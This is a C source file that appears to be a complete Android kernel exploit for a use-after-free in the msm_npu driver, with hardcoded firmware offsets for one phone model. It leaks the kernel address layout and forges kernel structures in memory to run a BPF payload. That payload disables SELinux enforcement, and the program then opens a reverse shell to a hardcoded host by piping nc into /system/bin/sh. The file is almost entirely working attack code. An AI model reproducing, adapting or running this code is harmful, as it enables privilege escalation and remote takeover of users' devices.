#include #include #include #include #include #include #include #include #include #include #include #include "npu_shell.h" #include "sendmsg_spray.h" #include "bpf_tools.h" #define NB_REALLOC_THREADS 8 #define STATS_BUF_SIZE 16384 #define OBJECT_SIZE 96 #define NB_REALLOC_THREADS 8 #define FAST_CPU 6 #define GFP_KERNEL (0x40 | 0x80 | 0x400000u | 0x1000000u) //For reverse shell #define HOST_IP "12.34.56.78" //-----------A71 firmware specific offsets--------------- #define BPF_PROG_RUN32 0xffffff80081445c0 #define INIT_TASK 0xffffff800aba9780 #define HOST_IRQ_WQ 0xffffff8008fe5170 #define ION_DMA_BUF_VUNMAP 0xffffff80091c82a0 #define BPF_CALL_BASE 0xffffff8008142ac0 #define SELINUX_ENFORCING 0xffffff800af7cf10 #define DO_TASK_DEAD 0xffffff800806d0b0 #define MEMSET 0xffffff800980a280 #define MEMCMP 0xffffff8009809d7c #define ARGV_SPLIT 0xffffff800980a968 #define CALL_USERMODEHELPER 0xffffff80080504f0 #define RUN_CMD_ENVP 0xffffff800abbaca8 #define ION_ALLOC_FD 0xffffff80091c69f8 //offsets to dma_buf and ion_buffer, probably fairly firmware independent #define PRIV_OFF 152 #define HEAP_OFF 32 #define OPS_OFF 56 #define MAP_OFF 16 #define UNMAP_OFF 24 #define CNT_OFF 104 //----------Bpf offsets--------------------------------- static int bpf_op_offset = 0x000; //rw input address static int bpf_rw_addr_offset = 0x008; //output address static int bpf_out_offset = 0x108; //arguments offsets static int bpf_arg0 = 0x10; static int bpf_arg1 = 0x18; static int bpf_arg2 = 0x20; static int bpf_arg3 = 0x28; static int bpf_arg4 = 0x30; //cmd buffer static int cmd_arg = 0x40; //----------------------------------------------------- static char g_realloc_data[OBJECT_SIZE] = {0}; static char g_stats_buf[STATS_BUF_SIZE] = {0}; struct network_exec_param { int npu_fd; int ion_alloc_fd; uint64_t npu_phys_addr; uint32_t network_hdl; char stats_buf[256]; }; static int open_dev(char* name) { int fd = open(name, O_RDONLY); if (fd == -1) { err(1, "cannot open %s\n", name); } return fd; } static int allocate_ion(int ion_fd, size_t len) { struct ion_allocation_data ion_alloc_data; ion_alloc_data.len = len; ion_alloc_data.flags = 1; ion_alloc_data.heap_id_mask = ION_HEAP(25); if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) { err(1, "ION_IOC_ALLOC failed\n"); } return ion_alloc_data.fd; } static uint64_t npu_map_buf(int npu_fd, int ion_alloc_fd, size_t size) { struct msm_npu_map_buf_ioctl map_param; map_param.buf_ion_hdl = ion_alloc_fd; map_param.size = size; if (ioctl(npu_fd, MSM_NPU_MAP_BUF, &map_param) < 0) { err(1, "NPU_MAP_BUF failed\n"); } return map_param.npu_phys_addr; } static uint32_t npu_load_network(int npu_fd, int ion_alloc_fd, uint64_t npu_phys_addr) { struct msm_npu_load_network_ioctl network_param; network_param.buf_ion_hdl = ion_alloc_fd; network_param.buf_phys_addr = npu_phys_addr; network_param.buf_size = 0x10000; network_param.first_block_size = 0x1000; if (ioctl(npu_fd, MSM_NPU_LOAD_NETWORK, &network_param) < 0) { err(1, "Load network failed\n"); } return network_param.network_hdl; } static uint32_t npu_load_network_v2(int npu_fd, int ion_alloc_fd, uint64_t npu_phys_addr) { struct msm_npu_load_network_ioctl_v2 network_param; struct msm_npu_patch_info_v2 patch_info_arr[2]; for (int i = 0; i < 1; i++) { patch_info_arr[i].value = npu_phys_addr; patch_info_arr[i].chunk_id = i; patch_info_arr[i].instruction_size_in_bytes = 1; patch_info_arr[i].variable_size_in_bits = 8; patch_info_arr[i].shift_value_in_bits = 8; patch_info_arr[i].loc_offset = 0x1000; } network_param.buf_ion_hdl = ion_alloc_fd; network_param.buf_phys_addr = npu_phys_addr; network_param.buf_size = 0x4000; network_param.first_block_size = 0x1000; network_param.num_layers = 0; network_param.patch_info_num = 1; network_param.priority = 0; network_param.patch_info = (uint64_t)(&patch_info_arr[0]); if (ioctl(npu_fd, MSM_NPU_LOAD_NETWORK_V2, &network_param) < 0) { err(1, "Load network v2 failed\n"); } return network_param.network_hdl; } static void npu_exec_network_v2(struct network_exec_param* network_exec_param, int trigger_uaf) { struct msm_npu_exec_network_ioctl_v2 exec_param_v2; struct msm_npu_patch_buf_info patch_buf_info_arr[2]; int npu_fd = network_exec_param->npu_fd; for (int i = 0; i < 2; i++) { patch_buf_info_arr[i].buf_id = network_exec_param->npu_phys_addr; patch_buf_info_arr[i].buf_phys_addr = network_exec_param->npu_phys_addr; } exec_param_v2.stats_buf_addr = (uint64_t)(&(network_exec_param->stats_buf[0])); exec_param_v2.flags = 0x0e0e | 0x70200; exec_param_v2.async = 1; exec_param_v2.network_hdl = network_exec_param->network_hdl; exec_param_v2.stats_buf_size = 256; exec_param_v2.patch_buf_info_num = 2; exec_param_v2.patch_buf_info = (uint64_t)(&patch_buf_info_arr[0]); if (trigger_uaf) { ioctl(npu_fd, MSM_NPU_EXEC_NETWORK_V2, &(exec_param_v2)); close(npu_fd); realloc_NOW(); } else { if (ioctl(npu_fd, MSM_NPU_EXEC_NETWORK_V2, &(exec_param_v2)) < 0) { err(1, "NPU_EXEC_v2 failed\n"); } } } static void npu_exec_network(struct network_exec_param* network_exec_param, int trigger_uaf) { struct msm_npu_exec_network_ioctl exec_param; int npu_fd = network_exec_param->npu_fd; exec_param.input_layers[0].buf_hdl = network_exec_param->ion_alloc_fd; exec_param.input_layers[0].buf_size = 0x10000; exec_param.input_layers[0].buf_phys_addr = network_exec_param->npu_phys_addr; exec_param.input_layers[0].patch_info.chunk_id = 0; exec_param.input_layers[0].patch_info.instruction_size_in_bytes = 0x16; exec_param.input_layers[0].patch_info.variable_size_in_bits = 0x16; exec_param.input_layers[0].patch_info.loc_offset = 0x10000; exec_param.output_layers[0].buf_hdl = network_exec_param->ion_alloc_fd; exec_param.output_layers[0].buf_size = 0x10000; exec_param.output_layers[0].buf_phys_addr = network_exec_param->npu_phys_addr; exec_param.output_layers[0].patch_info.chunk_id = 1; exec_param.output_layers[0].patch_info.instruction_size_in_bytes = 0x16; exec_param.output_layers[0].patch_info.variable_size_in_bits = 0x16; exec_param.output_layers[0].patch_info.loc_offset = 0x10000; exec_param.output_layer_num = 1; exec_param.input_layer_num = 1; exec_param.async = 1; exec_param.network_hdl = network_exec_param->network_hdl; exec_param.patching_required = 1; if (trigger_uaf) { ioctl(npu_fd, MSM_NPU_EXEC_NETWORK, &(exec_param)); close(npu_fd); realloc_NOW(); } else { if (ioctl(npu_fd, MSM_NPU_EXEC_NETWORK, &(exec_param)) < 0) { err(1, "NPU_EXEC failed\n"); } } } void npu_unload_network(int npu_fd, uint32_t network_hdl) { struct msm_npu_unload_network_ioctl unload_param; unload_param.network_hdl = network_hdl; if (ioctl(npu_fd, MSM_NPU_UNLOAD_NETWORK, &unload_param) < 0) { err(1, "unload network failed\n"); } } uint64_t compute_kaslr_offset() { struct network_exec_param network_exec_param; int ion_fd = open_dev("/dev/ion"); int npu_fd = open_dev("/dev/msm_npu"); int ion_alloc_fd = allocate_ion(ion_fd, 0x1000); uint64_t npu_phys_addr = npu_map_buf(npu_fd, ion_alloc_fd, 0x1000); uint32_t network_hdl = npu_load_network_v2(npu_fd, ion_alloc_fd, npu_phys_addr); network_exec_param.npu_fd = npu_fd; network_exec_param.ion_alloc_fd = ion_alloc_fd; network_exec_param.npu_phys_addr = npu_phys_addr; network_exec_param.network_hdl = network_hdl; npu_exec_network_v2(&network_exec_param, 0); usleep(10000); struct msm_npu_event event = {0}; uint64_t* data64 = (uint64_t*)(&event.u.data[0]); if (ioctl(npu_fd, MSM_NPU_RECEIVE_EVENT, &event) < 0) { err(1, "NPU_RECEIVE_EVENT failed\n"); } uint64_t* data = (uint64_t*)(&event.u.data[4]); uint64_t host_irq_wq_offset = data[10]; close(npu_fd); close(ion_fd); return host_irq_wq_offset; } uint64_t leak_and_populate_controlled_buffer(uint64_t host_irq_wq_offset) { struct network_exec_param network_exec_param; struct realloc_thread_arg rta[4]; int ion_fd = open_dev("/dev/ion"); migrate_to_cpu(FAST_CPU); int npu_fd = open_dev("/dev/msm_npu"); int ion_alloc_fd = allocate_ion(ion_fd, 0x1000); uint64_t npu_phys_addr = npu_map_buf(npu_fd, ion_alloc_fd, 0x1000); uint32_t network_hdl = npu_load_network_v2(npu_fd, ion_alloc_fd, npu_phys_addr); network_exec_param.npu_fd = npu_fd; network_exec_param.ion_alloc_fd = ion_alloc_fd; network_exec_param.npu_phys_addr = npu_phys_addr; network_exec_param.network_hdl = network_hdl; npu_exec_network_v2(&network_exec_param, 0); usleep(10000); struct msm_npu_event event = {0}; uint64_t* data64 = (uint64_t*)(&event.u.data[0]); if (ioctl(npu_fd, MSM_NPU_RECEIVE_EVENT, &event) < 0) { err(1, "NPU_RECEIVE_EVENT failed\n"); } uint64_t* stats64 = (uint64_t*)(&(network_exec_param.stats_buf[0])); printf("[+] network_stats_buf (controlled data) address: 0x%lx\n", stats64[0]); uint64_t network_buf_address = stats64[0]; memset(rta, 0, sizeof(rta)); for (int i = 0; i < 4; i++) { rta[i].realloc_data = &(g_stats_buf[0]); rta[i].object_size = STATS_BUF_SIZE; rta[i].cpu = FAST_CPU; } uint64_t bpf_data_address = network_buf_address + 0x3000; uint64_t __bpf_call_base = host_irq_wq_offset - HOST_IRQ_WQ + BPF_CALL_BASE; uint64_t mem_set = host_irq_wq_offset - HOST_IRQ_WQ + MEMSET; uint64_t mem_cmp = host_irq_wq_offset - HOST_IRQ_WQ + MEMCMP; uint64_t do_task_dead = host_irq_wq_offset - HOST_IRQ_WQ + DO_TASK_DEAD; uint64_t selinux_enforcing = SELINUX_ENFORCING - HOST_IRQ_WQ + host_irq_wq_offset; uint64_t selinux_page = selinux_enforcing & 0xfffffffffffff000; uint64_t argv_split = ARGV_SPLIT - HOST_IRQ_WQ + host_irq_wq_offset; uint64_t call_usermodehelper = CALL_USERMODEHELPER - HOST_IRQ_WQ + host_irq_wq_offset; uint64_t run_cmd_envp = RUN_CMD_ENVP - HOST_IRQ_WQ + host_irq_wq_offset; uint64_t ion_alloc_fd_addr = ION_ALLOC_FD - HOST_IRQ_WQ + host_irq_wq_offset; //bpf program to run program loaded at network_buf_address + 0x2000, which //overlaps with the ion_buffer used below and will have some parts overwritten. //I'll have to skip over those fields, which are at the following offsets (in size of bpf_insn): //4(heap),13(kmap_cnt),9(lock) struct bpf_insn insn[] = { // Load base address. /* 0 */ BPF_LD_IMM64(BPF_REG_6, bpf_data_address), //Jump over the instructions that I can't control /* */ BPF_JMP_A(20), //Jump over Unused /* Unused*/{0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, {0}, // Load R1 = *(in:data + 10); this is the first argument. /* */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_rw_addr_offset), // Load R2 = *(in:data + 18); this is the second argument. /* */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, bpf_arg0), // Load R3 = *(in:data + 20); this is the third argument. /* */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_6, bpf_arg2), // Call R0 = function(R1, R2, R3, R4, R5). Call memset. /* */ BPF_EMIT_CALL(mem_set), /* */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, cmd_arg), /* */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x50), /* */ BPF_LD_IMM64(BPF_REG_3, run_cmd_envp), /* */ BPF_LD_IMM64(BPF_REG_4, 0), /* */ BPF_EMIT_CALL(call_usermodehelper), // Call R0 = function(R1, R2, R3, R4, R5). Call do_task_dead to kill off the thread to save cleaning up. // This unfortunately means the bug cannot be triggered again. There is probably a better way to clean things up. /* */ BPF_EMIT_CALL(do_task_dead), }; memcpy(&g_stats_buf[0x2000], insn, sizeof(insn)); uint64_t* bpf_data = (uint64_t*)(&g_stats_buf[0x3000]); //set up write bpf_data[bpf_op_offset/8] = 'w'; //write to selinux enforcing bpf_data[bpf_rw_addr_offset/8] = selinux_enforcing; bpf_data[bpf_arg0/8] = 0; bpf_data[bpf_arg2/8] = 4; bpf_data[cmd_arg/8] = network_buf_address + 0x3500; bpf_data[0x50/8] = network_buf_address + 0x3600; const char* path = "/system/bin/sh"; const char* arg1 = "-c"; memset(&g_stats_buf[0x3500], 0, 0x200); memcpy(&g_stats_buf[0x3600], path, strlen(path)); memcpy(&g_stats_buf[0x3650], arg1, strlen(arg1)); sprintf((char*)(&g_stats_buf[0x3700]), "while [ 1 ]; do /system/bin/toybox nc %s 4446 | /system/bin/sh; done", HOST_IP); uint64_t* argv = (uint64_t*)(&g_stats_buf[0x3500]); argv[0] = network_buf_address + 0x3600; argv[1] = network_buf_address + 0x3650; argv[2] = network_buf_address + 0x3700; argv[3] = 0; uint64_t ion_dma_buf_vunmap_offset = ION_DMA_BUF_VUNMAP - HOST_IRQ_WQ + host_irq_wq_offset; struct wait_queue_entry* fake_entry = (struct wait_queue_entry*)(&g_stats_buf[0]); fake_entry->private = (void*)0x43434343434343; fake_entry->func = (wait_queue_func_t)ion_dma_buf_vunmap_offset; fake_entry->entry.next = network_buf_address + 24 + 0x100; fake_entry->entry.prev = network_buf_address + 24; fake_entry = (struct wait_queue_entry*)(&g_stats_buf[0x100]); fake_entry->private = (void*)0x43434343434242; fake_entry->func = (wait_queue_func_t)ion_alloc_fd_addr; fake_entry->entry.next = network_buf_address + 24 + 0x100; fake_entry->entry.prev = network_buf_address + 24 + 0x100; //dmabuf->priv uint64_t* buffer = (uint64_t*)(&g_stats_buf[0] + PRIV_OFF); *buffer = network_buf_address + 0x2000; //buffer->heap, ldr x8, [x20,#0x20] uint64_t* buffer_heap = (uint64_t*)(&g_stats_buf[0x2000] + HEAP_OFF); *buffer_heap = network_buf_address + 0x1000; //buffer->heap->ops uint64_t* buffer_heap_ops = (uint64_t*)(&g_stats_buf[0x1000] + OPS_OFF); *buffer_heap_ops = network_buf_address + 0x1500; //buffer->heap->ops->map_kernel uint64_t* fake_map_kernel = (uint64_t*)(&g_stats_buf[0x1500] + MAP_OFF); *fake_map_kernel = 0x45454545454545; uint64_t* fake_unmap_kernel = (uint64_t*)(&g_stats_buf[0x1500] + UNMAP_OFF); *fake_unmap_kernel = host_irq_wq_offset - HOST_IRQ_WQ + BPF_PROG_RUN32; //buffer->kmap_cnt uint32_t* kmap_cnt = (uint32_t*)(&g_stats_buf[0x2000] + CNT_OFF); *kmap_cnt = 1; if (init_reallocation(rta, 4)) { err(1, "[-] failed to initialize reallocation!\n"); } npu_unload_network(npu_fd, network_hdl); realloc_NOW(); close(npu_fd); close(ion_fd); reset(); return network_buf_address; } void trigger_uaf(uint64_t network_buf_addr) { struct network_exec_param network_exec_param; struct realloc_thread_arg rta[NB_REALLOC_THREADS]; printf("[+] trigger uaf\n"); int ion_fd = open_dev("/dev/ion"); migrate_to_cpu(FAST_CPU); int npu_fd = open_dev("/dev/msm_npu"); int ion_alloc_fd = allocate_ion(ion_fd, 0x1000); uint64_t npu_phys_addr = npu_map_buf(npu_fd, ion_alloc_fd, 0x1000); uint32_t network_hdl = npu_load_network_v2(npu_fd, ion_alloc_fd, npu_phys_addr); network_exec_param.npu_fd = npu_fd; network_exec_param.ion_alloc_fd = ion_alloc_fd; network_exec_param.npu_phys_addr = npu_phys_addr; network_exec_param.network_hdl = network_hdl; struct npu_client* npu_client = (struct npu_client*)(&g_realloc_data[0]); npu_client->npu_dev = (uint32_t*)0xabababab; //wait_queue_head //spinlock npu_client->wait.lock.owner = 0; npu_client->wait.lock.next = 0; npu_client->list_lock.wait_list.prev = 0x404040404040; npu_client->list_lock.wait_list.next = 0x404040404040; npu_client->evt_list.next = network_buf_addr; npu_client->evt_list.prev = network_buf_addr; npu_client->wait.head.next = network_buf_addr + 24; npu_client->wait.head.prev = 0x42424242424242; memset(rta, 0, sizeof(rta)); for (int i = 0; i < NB_REALLOC_THREADS; i++) { rta[i].realloc_data = &(g_realloc_data[0]); rta[i].object_size = OBJECT_SIZE; rta[i].cpu = FAST_CPU; } if (init_reallocation(rta, NB_REALLOC_THREADS)) { err(1, "[-] failed to initialize reallocation!\n"); } npu_exec_network_v2(&network_exec_param, 1); usleep(10000); close(ion_fd); reset(); } int overwrite_se(uint64_t host_irq_wq_offset) { uint64_t network_buf_addr = leak_and_populate_controlled_buffer(host_irq_wq_offset); trigger_uaf(network_buf_addr); char result = '2'; usleep(10000); int enforce_fd = open_dev("/sys/fs/selinux/enforce"); read(enforce_fd, &result, 1); close(enforce_fd); if (result == '0') { printf("[+] successfully overwritten selinux_enforcing\n"); char buffer[200]; sprintf(buffer, "/system/bin/nc %s 4446|/system/bin/sh", HOST_IP); char* argv[] = { "/system/bin/sh", "-c" , buffer, NULL}; char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL }; execve("/system/bin/sh",argv,envp); return 0; } printf("[-] failed to overwrite selinux_enforcing\n"); return -1; } int main() { setbuf(stdout, NULL); setbuf(stderr, NULL); pid_t pid = 1; uint64_t host_irq_wq_offset = 0; for (int i = 0; i < 100; i++) { host_irq_wq_offset = compute_kaslr_offset(); if (host_irq_wq_offset) break; } if (!host_irq_wq_offset) { err(1, "Failed to obtain offset\n"); } printf("[+] host_irq_wq offset: %lx\n", host_irq_wq_offset); pid = fork(); while (pid == 0) { if (!overwrite_se(host_irq_wq_offset)) exit(0); pid = fork(); } exit(0); }